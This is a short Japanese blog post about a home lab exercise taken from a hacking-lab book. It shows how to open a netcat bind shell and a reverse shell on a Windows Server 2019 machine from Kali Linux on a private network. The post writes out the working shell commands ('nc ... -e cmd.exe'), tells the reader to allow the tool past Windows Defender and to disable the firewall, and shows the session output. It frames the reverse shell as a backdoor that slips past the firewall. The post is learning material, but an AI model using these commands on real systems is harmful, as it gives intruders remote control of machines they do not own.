netcatでリモート操作してみました(バックドア)

参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」

今回は上記書籍を参考にnetcatというツールを使って
Kali LinuxからリモートのWindows2019を操作してみました。

1.環境
Kali Linux:192.168.0.15
Windows2019:192.168.0.25

2.Netcatの配置
Windows2019側の操作

Netcat for Windows
https://joncraton.org/blog/46/netcat-for-windows/

nc111nt.zip をダウンロードして展開(zipパスワードは「nc」)

WindowsDefenderにより退避させられてしまいますので、
許可して下さい。

今回は
C:\nc111nt に配置します。

コマンドプロンプトにて
cd c:\nc111nt

ヘルプ表示
nc -h

3.Windowsへのリモート接続
Windows2019側の操作

Port5555で接続を待ち受ける
nc -lvp 5555

別コマンドプロンプトにて
netstat -an
で確認すると Port5555でListenしていることがわかります。

このままだとファイアウォールで侵入できないので、
Windows側のファイアウォールを無効化します。

Kali側の操作

192.168.0.25のPort5555に接続
nc 192.168.0.25 5555

Windows側とメッセージが送受信できます。

4.Netcatによるバインドシェル
Windows側をコマンドで操作できるようにします。

Windows2019側の操作

nc -lvp 5555 -e cmd.exe

Kali側の操作

192.168.0.25のPort5555に接続
nc 192.168.0.25 5555

dirやcd などのWindows側でのコマンド操作と結果が表示されることが確認できます。
リモート操作成功です。

5.Netcatによるリバースシェル

バインドシェルと違い、リバースシェルでは、
Windows側からKali側のPort5555に接続に行くので、
Windows側のファイアウォールをすり抜けてKali側で操作することができます。
バックドア的なことをします。

Windows2019側の操作
Widows側のファイアウォールを有効にします。

Kali側の操作

nc -lvp 5555

Windows2019側の操作

nc 192.168.0.15 5555 -e cmd.exe

Kali側の画面

listening on [any] 5555 ...
192.168.0.25: inverse host lookup failed: No address associated with name
connect to [192.168.0.15] from (UNKNOWN) [192.168.0.25] 50093
Microsoft Windows [Version 10.0.17763.1158]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\nc111nt>

ファイアウォールをすり抜けてkali側でWindowsの操作ができるようになります。

6.まとめ
簡単にリモート操作できてしまったので驚きです。
次はパスワードクラックを試してみたいと思います。

Comments are closed.